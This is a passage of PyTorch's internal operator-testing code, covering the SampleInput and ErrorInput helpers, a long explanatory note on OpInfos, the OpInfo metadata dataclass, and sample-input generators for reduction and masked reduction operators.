t)) elif isinstance(t, dict): return {k: tt(v) for k, v in t.items()} else: return t sample_tt_input, tt_args, tt_kwargs = tt(self.input), tt(self.args), tt(self.kwargs) # Note the transformed SampleInput assumes metadata like output_process_fn_grad is still valid! return SampleInput( sample_tt_input, args=tt_args, kwargs=tt_kwargs, output_process_fn_grad=self.output_process_fn_grad, broadcasts_input=self.broadcasts_input, name=self.name + "_transformed") # Returns the NumPy version of the sample input object in the form of a tuple: (input, args, kwargs) # Converts tensors to ndarrays by calling .detach().cpu().numpy() on them # Converts dtypes by remapping them using torch_to_numpy_dtype_dict def numpy(self): def to_numpy(t): if isinstance(t, torch.Tensor): if t.dtype is torch.bfloat16: return t.detach().cpu().to(torch.float32).numpy() if t.dtype is torch.chalf: return t.detach().cpu().to(torch.cfloat).numpy() return t.detach().cpu().numpy() elif isinstance(t, torch.dtype): return torch_to_numpy_dtype_dict[t] return t return self.transform(to_numpy) def noncontiguous(self): def to_noncontiguous(t): if isinstance(t, torch.Tensor): return noncontiguous_like(t) elif isinstance(t, torch.dtype): return t return t return self.transform(to_noncontiguous) class ErrorInput(object): """ A SampleInput that will cause the operation to throw an error plus information about the resulting error. """ __slots__ = ['sample_input', 'error_type', 'error_regex'] def __init__(self, sample_input, *, error_type=RuntimeError, error_regex): self.sample_input = sample_input self.error_type = error_type self.error_regex = error_regex class AliasInfo(object): """Class holds alias information. For example, torch.abs -> torch.absolute, torch.Tensor.absolute, torch.Tensor.absolute_ """ def __init__(self, alias_name): self.name = alias_name self.op = _getattr_qual(torch, alias_name) self.method_variant = getattr(torch.Tensor, alias_name, None) self.inplace_variant = getattr(torch.Tensor, alias_name + "_", None) def __call__(self, *args, **kwargs): return self.op(*args, **kwargs) # Extension of getattr to support qualified names # e.g. _getattr_qual(torch, 'linalg.norm') -> torch.linalg.norm def _getattr_qual(obj, name, default=_NOTHING): try: for path in name.split('.'): obj = getattr(obj, path) return obj except AttributeError: if default is not _NOTHING: return default else: raise # test if a tensor is close to an integer def close_to_int(x, eps=0.1): if x.is_complex(): y = torch.abs(torch.view_as_complex(torch.frac(torch.view_as_real(x)))) else: y = torch.abs(torch.frac(x)) return (y < eps) | (y > (1 - eps)) NumericsFilter = collections.namedtuple('NumericsFilter', ['condition', 'safe_val']) # Note [OpInfos] # ~~~~~~~~~~~~~~ # # The majority of this note was written shortly after the PyTorch 1.9 release. # If you notice it's out-of-date or think it could be improved then please # file an issue. # # See also: the OpInfo tracker (https://github.com/pytorch/pytorch/issues/54261) # See also: "Writing Test Templates" in common_device_type.py to learn how to # parametrize a test template using OpInfos. # See also: PyTorch's GitHub wiki on running and writing tests # https://github.com/pytorch/pytorch/wiki/Running-and-writing-tests # See also: ModuleInfos, OpInfo's sister class, defined in common_modules.py # # An OpInfo is a collection of metadata related to a PyTorch operator. This # metadata is used to generate tests that validate properties of the operator, # like if it implements the correct gradient formula. # # WHY OPINFOS? # ~~~~~~~~~~~~ # # OpInfos are principally intended to do three things: # # 1) to allow systematic testing over all PyTorch's operators # 2) to simplify operating testing by autogenerating many tests # 3) to allow systems (like autograd, torchscript, fx, nnc...) to test # against every PyTorch operator # # All these goals are still a work in progress. Not every operator has an # OpInfo, and some operator tests that could be automatically generated # still have to be written manually. # # It's helpful to understand that OpInfos are both about test simplification and # modularity. PyTorch is a complicated framework with many interrelated systems, # too many for any one person to keep track of. An OpInfo can be thought of as the # interface between an operator implementer and those other systems. Instead of # requiring the implementer of torch.foo understand how to test its forward # mode AD or NNC support that's typically handled automatically just by # defining an OpInfo. # # It's often surprising to OpInfo writers that just implementing an OpInfo # typically can't verify an operator is actually implemented correctly: # # "If an OpInfo doesn't validate my op works as expected, what's the point # of it?" # # But the point of is the above. OpInfos are intended to let you focus on testing # the operator logic you're familiar with instead of having to write tests for # how the operator interacts with each of PyTorch's many systems. # # And, OK, it turns out that SOMETIMES just writing an OpInfo DOES # validate your op works as expected, but that's only in special # cases. See below for details. # # WHAT'S AN OPINFO? # ~~~~~~~~~~~~~~~~~ # # So what is an OpInfo? It's a Python class that describes an operator's properties, # like which dtypes it supports on the CPU and whether it has any aliases. # These properties can be divided into three categories: # # 1) Metadata describing the operator, like the operator's name and if it # "supports" the out kwarg. # 2) Test directives, like "skips" that tell the test suite to skip some # tests. # 3) A "sample inputs" function that generates valid inputs for the operator. # # OpInfo attributes are described in more detail below. # # THE SAMPLE INPUTS FUNCTION # ~~~~~~~~~~~~~~~~~~~~~~~~~~ # # The "sample inputs" function merits special elaboration. This function is # crucial to testing with OpInfos. A typical OpInfo test has to treat the operator # as a black box. There's no structure for the test to understand or exploit. # Without "sample inputs" it wouldn't even know how to call the OpInfo's # operator. The sample input function saves the day by providing different # "SampleInputs" that can be used to call the operator. A sample input # function should have the following signature: # # def sample_inputs_foo(op_info, device, dtype, requires_grad, **kwargs): # # And should return an iterable of SampleInputs (see the class description # above). Each SampleInput defines an "input", "args", "kwargs", an # "output_process_fn_grad" function, the "broadcasts_input" bool and a # "name". # # All the "sample_inputs" functions are invoked within a `torch.no_grad()` # environment for efficiency and correctness. As such remember to set the # "requires_grad" flag on the inputs **after** performing any transformations # on them. # # The "input" is the first argument to the operator, or the tensor that # the method or inplace variants of the operator should be called on, and # should be on the requested device, of the requested dtype, and its # requires_grad attribute should be set to the requires_grad argument. # # "args" should contain positional arguments, and "kwargs" keyword arguments. # # "output_process_fn_grad" has an interesting name. It's a function that maps # the operator's output (when given the input, args, and kwargs) to the # portion of the output to gradcheck. For example, consider an operator # like torch.linalg.slogdet # (https://pytorch.org/docs/master/generated/torch.linalg.slogdet.html). # This operator returns a tuple of two tensors, but the first tensor # cannot be backwarded through. Its "output_process_fn_grad" filters # this output tuple to just the second argument, which we can call backward # on. Functions that produce a single tensor can ignore this argument. # # "broadcasts_input" is a bool indicated if the SampleInput causes the operator # to broadcast the "input" argument. This is important for tests to understand # because inplace variants of operations throw a runtime error if they # would broadcast their input arguments, so tests that work with inplace # variants filter SampleInputs that broadcast their input. # # "name" is a string that's just used for debugging. It appears when printing # the SampleInput. # # Sample inputs are designed to be used with many tests, some # that are very time consuming, so they should be a small # set with small tensors. An elaborated set of sample inputs # can be specified using the "reference_inputs_func" attribute. # The "reference inputs" for an operation are an extended # set of sample inputs that can more exhausively test an # operator. They are used by only a few tests that are careful # not to take too long to run. Adding reference inputs # is highly encouraged! # # THE (OPTIONAL) ERROR INPUTS FUNCTION # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # OpInfos may optionally specify "error inputs" through an error function. If # specified test_errors in test_ops.py will call the op with these inputs # and validate that the desired error is thrown. # # Error inputs automate a common testing pattern where multiple inputs are # passed to an operation and the errors they thrown are reviewed. Tests # written in this style should be ported to the new OpInfo pattern. # # Error inputs are specified using the ErrorInputs class, which contains # a SampleInput (see above) and data about the expected error. # # OPINFO FILE ORGANIZATION # ~~~~~~~~~~~~~~~~~~~~~~~~ # # All OpInfos are currently defined in this file. Most OpInfo tests are defined # in test_ops.py, but some system-specific tests are defined in those # systems' test files, and subclass-specific tests are defined in the test # file that corresponds to that subclass (see the below). # Expect a reorganization in the future. # # WHAT'S TESTED? # ~~~~~~~~~~~~~~ # # Every OpInfo in the op_db sequence has the following properties validated in # test_ops.py: # # - that its supported dtypes are specified correctly # - that the operation produces the same results when called with noncontiguous inputs # - that it supports the out= argument properly (if it allows out=), # see https://github.com/pytorch/pytorch/wiki/Developer-FAQ#how-does-out-work-in-pytorch # - that it works with the conjugate view bit properly # - that its function, method, and inplace variants perform the same operation # (that is, that torch.add, torch.Tensor.add, and torch.Tensor.add_ all # do the same thing). # - that its inplace variant preserves the input's storage # - that its gradient formula is implemented correctly, and that it supports # gradgrad and complex grad and gradgrad and forward mode AD properly for # the op's function and inplace variants (method variants are skipped # to reduce test time). # - that the operation performs the same operation when traced or scripted # using the jit # - that the operation is autodifferentiated by the jit as expected # - that the operator's aliases, if any, perform the same operation and that # the jit understands the alias # - that the operator throws the correct errors (if error_inputs is defined) # - that the operator produces the same results as a NumPy reference (if ref is defined) # - that the operator produces the same results as a NumPy reference on an extended # set of "reference inputs" (if both ref and reference_inputs_func are defined) # (NOTE: elementwise unary and elementwise binary OpInfos do this even if only # ref is defined, because they effectively autogenerate reference inputs) # - that the operator works on different CUDA devices # # Additional OpInfo tests are in test_jit_fuser_te.py, test_fx_experimental.py, # and test_fx.py. These tests validate that operators work with NNC and FX # as expected. # # For performance, some of the above tests may only run on the first # SampleInput returned by an OpInfo's sample input function. # # In addition to these tests, some subclasses (discussed in the next section) # define additional tests. # # Critically, as mentioned above, what's not necessarily tested is that the operator # works as expected. When implementing an OpInfo an engineer must still # typically write one or more tests validating the operator's behavior. # The exception to this is if reference testing is sufficient, or if # the operation belongs to an OpInfo subclass that has more exhaustive # operator testing. Elementwise unary and elementwise binary operators, # in particular, usually don't require additional testing beyond # writing an Opinfo. # # # OPINFO (SUB)CLASSES # ~~~~~~~~~~~~~~~~~~~ # # In addition to the OpInfo base class there are several specialized OpInfo # subclasses. For example, the UnaryUfuncInfo subclass is used for # unary elementwise operations. These operations have a common structure # that test_unary_ufuncs.py exploits with additional automated testing. # The automated testing in test_unary_ufuncs.py is so thorough, comparing # the operator to a NumPy reference function on a plethora of values, that # just implementing an OpInfo for a unary elementwise operation is often # sufficient testing. # # The ForeachFuncInfo is another OpInfo subclass that is hyper-specialized to a # very unique class of operations. These OpInfos aren't included in the # op_db sequence and have their own tests. # # Other OpInfo subclasses, like SpectralFuncInfo, are just for convenience # when writing OpInfos. # # TESTING A NEW OPERATOR # ~~~~~~~~~~~~~~~~~~~~~~ # # If you're adding a new operator to any of the following namespaces: # - torch # - torch.fft # - torch.linalg, # - torch.special # - torch.nn.functional # then you should typically add an OpInfo for it. # # As mentioned a couple times above, implementing an OpInfo is not # usually sufficient testing (unless the operator is a unary or binary elementwise # operator). The OpInfo will only test the properties described in the # "WHAT'S TESTED" section. It DOES NOT necessarily verify that the operator is # implemented correctly. # # TIPS FOR WRITING AN OPINFO AND OPINFO TESTS # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # Writing an OpInfo can be a little daunting. Since the point of an OpInfo is to # be consumed by a variety of systems it can be hard to understand how to # deal with test failures or how to set the OpInfo metadata properly. # # Before adding an OpInfo it helps to look at other OpInfos. A sample inputs # function must be defined, and the operator's dtypes must be specified. # Once that's done you should run the operator's tests in test_ops.py # (these can be filtered using the "-k" argument in pytest). Tests that # fail should provide an error message that describes what to change about # your OpInfo. You don't need to worry about changing an OpInfo's default # values unless a test yells at you. # # Similarly, if you're writing a test that consumes OpInfos then it's critical # your test provides a clear error message describing what to do when it # fails. You should not assume the OpInfo implementer is familiar with your # system. # # If you see a confusing error message while developing an OpInfo then please # file an issue describing what happened. # # This trial-and-error approach to writing an OpInfo can be frustrating, # but it's probably necessary as long as OpInfos don't require # learning about all the systems that consume them. One thing that can help # is the get_supported_dtypes() function defined in opinfo_helper.py. This # function can be used to programmatically specify the dtypes an operator # supports, and is especially useful if writing an OpInfo on a machine # without a CUDA device. See its documentation for more details. # # THE FUTURE OF OPINFOS AND OPINFO TESTING # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # In the future we expect OpInfo coverage to improve and cover # the great majority of PyTorch's (public) operators. # # Classes and methods for the operator database @dataclass class OpInfo(object): """Operator information and helper functions for acquiring it.""" # the string name of the function name: str # An optional reference function that accepts ndarrays (AKA "NumPy arrays"). # If given, the op will be compared with its reference on each of its sample inputs. ref: Callable = None # the following metadata describes the operator, its variants, and its aliases, if any # iterable of aliases, e.g. ("absolute",) for torch.abs aliases: Iterable = None # additional string to include in the test name # this is useful when an op needs multiple OpInfos, # like divide does, often because it's really several # different ops behind the scenes variant_test_name: str = '' # the function variant of the operation, populated as torch.<name> if None op: Callable = None # allows the method variant of this operation to be specified as follows: # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name # - if None, then the OpInfo explicitly specifies is has no associated method # - if a Callable, then that callable should be the method associated with this operation method_variant: Callable = _NOTHING # allows the inplace variant of this operation to be specified as follows: # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name # - if None, then the OpInfo explicitly specifies is has no associated inplace variant # - if a Callable, then that callable should be the inplace variant associated with this operation inplace_variant: Callable = _NOTHING # allows the operator variant of this operation to be specified as follows: # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name # - if None, then the OpInfo explicitly specifies is has no associated operator # - if a Callable, then that callable should be the operator associated with this operation operator_variant: Callable = _NOTHING # allows the inplace operator variant of this operation to be specified as follows: # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name # - if None, then the OpInfo explicitly specifies is has no associated inplace operator # - if a Callable, then that callable should be the inplace operator associated with this operation inplace_operator_variant: Callable = _NOTHING # the following metadata are test directives for skipping or modifying tests # information about which tests to skip skips: Tuple = tuple() # decorators to apply to generated tests decorators: Tuple = tuple() # the following are pointers to functions to generate certain classes of inputs # function to generate sample inputs with strided layouts sample_inputs_func: Callable = None # function to generate a more thorough set of samples inputs with strided layouts reference_inputs_func: Callable = None # function to generate inputs that will throw errors error_inputs_func: Callable = None # function to generate sample inputs with sparse coo layouts sample_inputs_sparse_coo_func: Callable = None # function to generate sample inputs with sparse csr layouts sample_inputs_sparse_csr_func: Callable = None # the following metadata relates to dtype support and is tested for correctness in test_ops.py # dtypes this function works with on the CPU, # inherited by other device types that don't specify their own dtypes dtypes: _dispatch_dtypes = None # the following dtypesIf... options override the dtypes value on their respective device types # dtypes this function is expected to work with on CUDA dtypesIfCUDA: _dispatch_dtypes = None # dtypes this function is expected to work with on ROCM dtypesIfROCM: _dispatch_dtypes = None # backward dtypes this function is expected to work with backward_dtypes: _dispatch_dtypes = None # backward dtypes this function is expected to work with on CUDA backward_dtypesIfCUDA: _dispatch_dtypes = None # backward dtypes this function is expected to work with on ROCM backward_dtypesIfROCM: _dispatch_dtypes = None # the following metadata describes the operators out= support # whether the op supports the out kwarg # defaults to True, if the op does not allow the out kwarg or # supports it incorrectly then test_out in test_ops.py should fail supports_out: bool = True # the following metadata relates to autograd support # whether the operation supports backward mode AD # if true, gradient correctness is tested in test_ops.py # using the op's sample inputs supports_autograd: bool = True # whether the op supports second order gradients # if true, gradgrad correctness is tested in test_ops.py # defaults to support_autograd's value # TODO: rename this to supports_bwgrad_bwgrad to be consistent with below supports_gradgrad: bool = None # whether the ops supports second order gradients via # forward-over-reverse. If True, forward-over-reverse gradgrad correctness # is tested. If False, test that forward grad is not implemented. # Defaults to False. supports_fwgrad_bwgrad: bool = False # whether the operation supports inplace autograd # if true, tested in test_ops.py # defaults to supports_autograd's value supports_inplace_autograd: bool = None # Whether the operation support forward mode AD # If the value is True, we check that the gradients are correct # If the value is False, we test that forward grad is not implemented supports_forward_ad: bool = False # wrapper function for gradcheck gradcheck_wrapper: Callable = lambda op, *args, **kwargs: op(*args, **kwargs) # whether to check batched grad when doing gradcheck # defaults to support_autograd's value check_batched_grad: bool = None # whether to check batched grad grad when doing gradgradcheck # default's to support_gradgrad's value check_batched_gradgrad: bool = None # whether to check batched forward grad when doing gradcheck # defaults to the value of `supports_forward_ad` check_batched_forward_grad: bool = None # whether to check batched forward grad when doing gradcheck # defaults to the value of `check_batched_forward_grad` check_inplace_batched_forward_grad: bool = None # tolerance for nondeterminism while performing gradcheck gradcheck_nondet_tol: float = 0.0 # Whether to use the fast implmentation for gradcheck/gradgradcheck. # When set to None, defers to the default value provided by the wrapper # function around gradcheck (testing._internal.common_utils.gradcheck) gradcheck_fast_mode: bool = None # the following metadata relates to JIT support and is tested for correctness in test_ops.py # name of the corresponding aten:: operator aten_name: str = None # if this is a composite implicit autograd op, the decomposed op decomp_aten_name: Optional[str] = None # name of the corresponding aten:: operator for backwards aten_backward_name: Optional[str] = None # if a op's aten::node is expected to be symbolically autodiffed assert_autodiffed: bool = False # a list of strings with node names that are expected to be in a # DifferentiableGraph when autodiffed. Ex: ['aten::add', 'aten::mm'], # default is populated to be ['aten::(name of Python operator)'] autodiff_nonfusible_nodes: List[str] = None # a list of strings with node names that are expected to be in FusionGroups # inside of DifferentiableGraphs when this operation is autodiffed. # Ex: ['aten::add', 'aten::mm'], defaults to an empty list # Note: currently no ops use fusible nodes autodiff_fusible_nodes: List[str] = None # the following metadata relates to sparse support and is used in test_sparse.py # whether the op supports sparse inputs supports_sparse: bool = False # only run tracing tests supports_scripting: bool = True # the following metadata relates to sparse csr support and is used in test_sparse_csr.py # whether the op supports sparse csr inputs supports_sparse_csr: bool = False # the following metadata relates to complex support and is checked in test_ops.py test_conjugated_samples: bool = True test_neg_view: bool = True # assert that jit shape analysis fully propagates shape assert_jit_shape_analysis: bool = False # the following metadata relates to ExpandedWeights support and is checked in test_expanded_weights.py supports_expanded_weight: bool = False def __post_init__(self): self._original_opinfo_args = asdict(self).copy() assert self.dtypes is not None, "OpInfo for {0} has no dtypes!".format(self.name) dtypes_args = (self.dtypes, self.dtypesIfCUDA, self.dtypesIfROCM) # Validates the dtypes are generated from the dispatch-related functions for dtype_list in dtypes_args: assert isinstance(dtype_list, (_dispatch_dtypes, type(None))) if self.aten_name is None: self.aten_name = self.name # Attribute to verify dynamic_dtypes are used. self.dynamic_dtypes = any(map(lambda dtypes: isinstance( dtypes, opinfo_helper._dynamic_dispatch_dtypes), dtypes_args)) if self.dynamic_dtypes: # Make sure `dtyesIfCUDA` is dynamic, if dynamic dispatch is used for CPU # This is because, below we set dtypesIfCUDA to dtypes if they are None. assert isinstance(self.dtypesIfCUDA, opinfo_helper._dynamic_dispatch_dtypes), \ (f"To use dynamic dypes for operator {self.name}, " "acquire the dtypes dynamically for argument `dtypesIfCUDA`." "This is to ensure that CUDA dtypes are acquired correctly as they" "differ from CPU dtypes occasionally") self.dtypes = set(self.dtypes) # NOTE: backward dtypes must be acquired before forward dtypes # since they fallback to explicit (not implicit!) specifications of # forward dtypes self.backward_dtypesIfROCM = set(self.backward_dtypesIfROCM) if self.backward_dtypesIfROCM is not None else ( self.backward_dtypesIfCUDA if self.backward_dtypesIfCUDA is not None else self.backward_dtypes if self.backward_dtypes is not None else self.dtypesIfROCM if self.dtypesIfROCM is not None else self.dtypesIfCUDA if self.dtypesIfCUDA is not None else self.dtypes) self.backward_dtypesIfCUDA = set(self.backward_dtypesIfCUDA) if self.backward_dtypesIfCUDA is not None else ( self.backward_dtypes if self.backward_dtypes is not None else self.dtypesIfCUDA if self.dtypesIfCUDA is not None else self.dtypes) self.backward_dtypes = set(self.backward_dtypes) if self.backward_dtypes is not None else self.dtypes self.dtypesIfCUDA = set(self.dtypesIfCUDA) if self.dtypesIfCUDA is not None else self.dtypes self.dtypesIfROCM = set(self.dtypesIfROCM) if self.dtypesIfROCM is not None else self.dtypesIfCUDA # NOTE: if the op is unspecified it is assumed to be under the torch namespace if not self.op: self.op = _getattr_qual(torch, self.name) if self.method_variant is _NOTHING: self.method_variant = getattr(torch.Tensor, self.name, None) # attributes like real, imag are not callable if not callable(self.method_variant): self.method_variant = None if self.inplace_variant is _NOTHING: inplace_name = self.name + "_" self.inplace_variant = getattr(torch.Tensor, inplace_name, None) if self.operator_variant is _NOTHING: self.operator_variant = getattr(operator, self.name, None) if self.inplace_operator_variant is _NOTHING: # Note: operator.i<op> will use operator.<op> and assign the result to the lhs when no # __i<op>__ method is found. This results in the appearance of an inplace operator variant which # does not have the correct inplace behavior. To avoid this, we guard automatic detection of the inplace # operator with a check that an inplace variant exists. if self.inplace_variant is not None: inplace_operator_name = "i" + self.name self.inplace_operator_variant = getattr(operator, inplace_operator_name, None) else: self.inplace_operator_variant = None self.decorators = (*self.decorators, *self.skips) # We run the sampling functions without tracking the gradiends of the creation of inputs self.sample_inputs_func = torch.no_grad()(self.sample_inputs_func) self.sample_inputs_sparse_coo_func = torch.no_grad()(self.sample_inputs_sparse_coo_func) self.sample_inputs_sparse_csr_func = torch.no_grad()(self.sample_inputs_sparse_csr_func) if self.reference_inputs_func is not None: self.reference_inputs_func = torch.no_grad()(self.reference_inputs_func) if not self.autodiff_fusible_nodes: self.autodiff_fusible_nodes = [] if self.autodiff_nonfusible_nodes is None: self.autodiff_nonfusible_nodes = ['aten::' + self.name] # Autograd support # Autograd flags that depend on backward AD only # - If setting has been explicitly set, raise error if inconsistent if self.supports_gradgrad is None: self.supports_gradgrad = self.supports_autograd else: assert not (self.supports_gradgrad and not self.supports_autograd), ( "supports_gradgrad refines the part of autograd is supported, so it should " "not be set if supports_autograd is False") if self.check_batched_grad is None: self.check_batched_grad = self.supports_autograd or self.supports_forward_ad else: assert not (self.check_batched_grad and not (self.supports_autograd or self.supports_forward_ad)), ( "check_batched_grad refines the part of autograd that will be checked (by gradcheck), so " "it should not be set if supports_autograd is False") if self.check_batched_gradgrad is None: self.check_batched_gradgrad = self.supports_gradgrad else: assert not (self.check_batched_gradgrad and not self.supports_gradgrad), ( "check_batched_gradgrad refines the part of autograd that will be checked (by " "gradgradcheck), so it should not be set if either supports_gradgrad or supports_autograd " "is False.") if self.check_batched_forward_grad is None: self.check_batched_forward_grad = self.supports_forward_ad else: assert not (self.check_batched_forward_grad and not self.supports_forward_ad), ( "check_batched_forward_grad should only be used when supports_forward_ad " "is True. It is used to disable the test in the specific cases " "where the op supports forward ad but fails to compute " "batched forward grad.") if self.check_inplace_batched_forward_grad is None: self.check_inplace_batched_forward_grad = self.check_batched_forward_grad else: assert not (self.check_inplace_batched_forward_grad and not self.check_batched_forward_grad), ( "check_batched_forward_grad should only be used when check_batched_forward_grad " "is True. It is used to disable the test in the specific cases " "where the op supports batched forward grad but fails to compute batched forward " "grad for the inplace variant of the op.") assert not (self.supports_fwgrad_bwgrad and not self.supports_autograd), ( "supports_fwgrad_bwgrad enables forward-over-backward gradgrad checks and should only be " "True if backward ad is also checked, i.e., supports_forward_ad should be True.", self.name) # Autograd flags that depend on both forward AD and backward AD if self.supports_inplace_autograd is None: self.supports_inplace_autograd = self.supports_autograd or self.supports_forward_ad else: assert not (self.supports_inplace_autograd and not self.supports_autograd and not self.supports_forward_ad), ( "supports_inplace_autograd refines the part of autograd that is supported, so " "it should not be set if both supports_autograd and supports_forward_ad are False") if self.aliases is not None: self.aliases = tuple(AliasInfo(a) for a in self.aliases) # type: ignore[assignment] else: self.aliases = () def __call__(self, *args, **kwargs): """Calls the function variant of the operator.""" return self.op(*args, **kwargs) def __str__(self): return dataclass_repr(self) def get_op(self): """Returns the function variant of the operator, torch.<op_name>.""" return self.op def get_method(self): """Returns the method variant of the operator, torch.Tensor.<op_name>. Returns None if the operator has no method variant. """ return self.method_variant def get_inplace(self): """Returns the inplace variant of the operator, torch.Tensor.<op_name>_. Returns None if the operator has no inplace variant. """ return self.inplace_variant def get_operator(self): """Returns operator variant of the operator, e.g. operator.neg Returns None if the operator has no operator variant. """ return self.operator_variant def get_inplace_operator(self): """Returns the inplace operator variant of the operator, e.g operator.iadd Returns None if the operator has no inplace operator variant""" return self.inplace_operator_variant def conjugate_sample_inputs(self, device, dtype, requires_grad=False, **kwargs): """Returns an iterable of SampleInputs but with the tensor input or first tensor in a sequence input conjugated. """ samples = self.sample_inputs_func(self, device, dtype, requires_grad, **kwargs) conj_samples = list(samples) def conjugate(tensor): _requires_grad = tensor.requires_grad tensor = tensor.conj() return tensor.requires_grad_(_requires_grad) for i, sample in enumerate(samples): sample = conj_samples[i] # Note: it is assumed that the input here is either a tensor or tensorlist if isinstance(sample.input, torch.Tensor): sample.input = conjugate(sample.input) else: sample.input[0] = conjugate(sample.input[0]) return tuple(conj_samples) def sample_inputs(self, device, dtype, requires_grad=False, **kwargs): """ Returns an iterable of SampleInputs. These samples should be sufficient to test the function works correctly with autograd, TorchScript, etc. """ samples = self.sample_inputs_func(self, device, dtype, requires_grad, **kwargs) if kwargs.get('include_conjugated_inputs', False): conj_samples = self.conjugate_sample_inputs(device, dtype, requires_grad, **kwargs) samples_list = list(samples) samples_list.extend(conj_samples) samples = tuple(samples_list) return samples def reference_inputs(self, device, dtype, requires_grad=False, **kwargs): """ Returns an iterable of SampleInputs. Distinct from sample_inputs() above because this returns an expanded set of inputs when reference_inputs_func is defined. If undefined this returns the sample inputs. """ if self.reference_inputs_func is None: return self.sample_inputs_func(self, device, dtype, requires_grad, **kwargs) if kwargs.get('include_conjugated_inputs', False): raise NotImplementedError return self.reference_inputs_func(self, device, dtype, requires_grad, **kwargs) def error_inputs(self, device, **kwargs): """ Returns an iterable of ErrorInputs. """ return self.error_inputs_func(self, device, **kwargs) def sample_inputs_sparse_coo(self, device, dtype, requires_grad=False, **kwargs): """Returns an iterable of SampleInputs that contain inputs with sparse coo layout. """ return self.sample_inputs_sparse_coo_func(self, device, dtype, requires_grad, **kwargs) def sample_inputs_sparse_csr(self, device, dtype, requires_grad=False, **kwargs): """Returns an iterable of SampleInputs that contain inputs with sparse csr layout. """ return self.sample_inputs_sparse_csr_func(self, device, dtype, requires_grad, **kwargs) def get_decorators(self, test_class, test_name, device, dtype): '''Returns the decorators targeting the given test.''' result = [] for decorator in self.decorators: if isinstance(decorator, DecorateInfo): if decorator.is_active(test_class, test_name, device, dtype): result.extend(decorator.decorators) else: result.append(decorator) return result def supported_dtypes(self, device_type): if device_type == 'cpu': return self.dtypes if device_type == 'cuda': return self.dtypesIfROCM if TEST_WITH_ROCM else self.dtypesIfCUDA else: return self.dtypes def supported_backward_dtypes(self, device_type): if not self.supports_autograd: return set() backward_dtypes = None if device_type == 'cpu': backward_dtypes = self.backward_dtypes elif device_type == 'cuda': backward_dtypes = self.backward_dtypesIfROCM if TEST_WITH_ROCM else self.backward_dtypesIfCUDA else: backward_dtypes = self.backward_dtypes allowed_backward_dtypes = floating_and_complex_types_and(torch.bfloat16, torch.float16, torch.complex32) return set(allowed_backward_dtypes).intersection(backward_dtypes) def supports_dtype(self, dtype, device_type): return dtype in self.supported_dtypes(device_type) @property def formatted_name(self): """Returns a formatted full name for this OpInfo that can be used in test names.""" variant = '_' + self.variant_test_name.replace('.', '_') if self.variant_test_name else '' return '{}{}'.format(self.name.replace('.', '_'), variant) def _generate_reduction_inputs(device, dtype, requires_grad, **kwargs): """Generates input tensors for testing reduction operators""" yield make_tensor([], dtype=dtype, device=device, requires_grad=requires_grad) yield make_tensor([2], dtype=dtype, device=device, requires_grad=requires_grad) yield make_tensor([3, 5], dtype=dtype, device=device, requires_grad=requires_grad) yield make_tensor([3, 2, 1, 2], dtype=dtype, device=device, requires_grad=requires_grad) def _generate_reduction_kwargs(ndim, supports_multiple_dims=True): """Generates a subset of all valid dim and keepdim kwargs given ndim that is appropriate for testing reduction operators. """ # Test default dim and keepdim yield {} # Test reducing inner and outer most dimensions yield {'dim': 0, 'keepdim': True} yield {'dim': -1, 'keepdim': False} # Test reducing middle dimension if ndim > 2: yield {'dim': ndim // 2, 'keepdim': True} if supports_multiple_dims: # Test reducing all dimensions yield {'dim': tuple(range(ndim)), 'keepdim': False} # Test reducing both first and last dimensions if ndim > 1: yield {'dim': (0, -1), 'keepdim': True} # Test reducing every other dimension starting with the second if ndim > 3: yield {'dim': tuple(range(1, ndim, 2)), 'keepdim': False} def sample_inputs_reduction(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for reduction operators.""" # TODO(@heitorschueroff) Once all reduction operators are using # ReductionOpInfo use op_info.supports_multiple_dims directly. supports_multiple_dims: bool = kwargs.get('supports_multiple_dims', True) # TODO(@heitorschueroff) Once all reduction operators are using ReductionOpInfo # use op_info.generate_args_kwargs directly. generate_args_kwargs = kwargs.get('generate_args_kwargs', lambda *args, **kwargs: (yield tuple(), {})) for t in _generate_reduction_inputs(device, dtype, requires_grad): for reduction_kwargs in _generate_reduction_kwargs(t.ndim, supports_multiple_dims): for args, kwargs in generate_args_kwargs(t, **reduction_kwargs): kwargs.update(reduction_kwargs) yield SampleInput(t.detach().requires_grad_(requires_grad), args=args, kwargs=kwargs) def _generate_masked_op_mask(input_shape, device, **kwargs): yield None yield make_tensor(input_shape, dtype=torch.bool, device=device, requires_grad=False) if len(input_shape) > 2: # broadcast last mask dimension: yield make_tensor(input_shape[:-1] + (1,), dtype=torch.bool, device=device, requires_grad=False) # broadcast middle mask dimension: yield make_tensor(input_shape[:1] + (1,) + input_shape[2:], dtype=torch.bool, device=device, requires_grad=False) # broadcast first mask dimension: yield make_tensor((1,) + input_shape[1:], dtype=torch.bool, device=device, requires_grad=False) # mask.ndim < input.ndim yield make_tensor(input_shape[1:], dtype=torch.bool, device=device, requires_grad=False) # mask.ndim == 1 yield make_tensor(input_shape[-1:], dtype=torch.bool, device=device, requires_grad=False) # masks that require broadcasting of inputs (mask.ndim > # input.ndim) will not be supported, however, we may # reconsider this if there will be demand on this kind of # degenerate cases. def sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked reduction operators. Masked reduction operator is a reduction operator with trailing mask optional argument. A mask is a bool tensor with the same shape as input or a shape that is broadcastable to input shape. """ kwargs['supports_multiple_dims'] = op_info.supports_multiple_dims for sample_input in sample_inputs_reduction(op_info, device, dtype, requires_grad, **kwargs): for mask in _generate_masked_op_mask(sample_input.input.shape, device, **kwargs): sample_input_args, sample_input_kwargs = sample_input.args, dict(mask=mask, **sample_input.kwargs) yield SampleInput(sample_input.input.detach().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) if(not requires_grad and dtype.is_floating_point and sample_input.input.ndim == 2 and mask is not None and mask.shape == sample_input.input.shape): for v in [torch.inf, -torch.inf, torch.nan]: t = sample_input.input.detach() t.diagonal(0, -2, -1).fill_(v) yield SampleInput(t.requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) def sample_inputs_sparse_coo_masked_reduction(op_info, device, dtype, requires_grad, 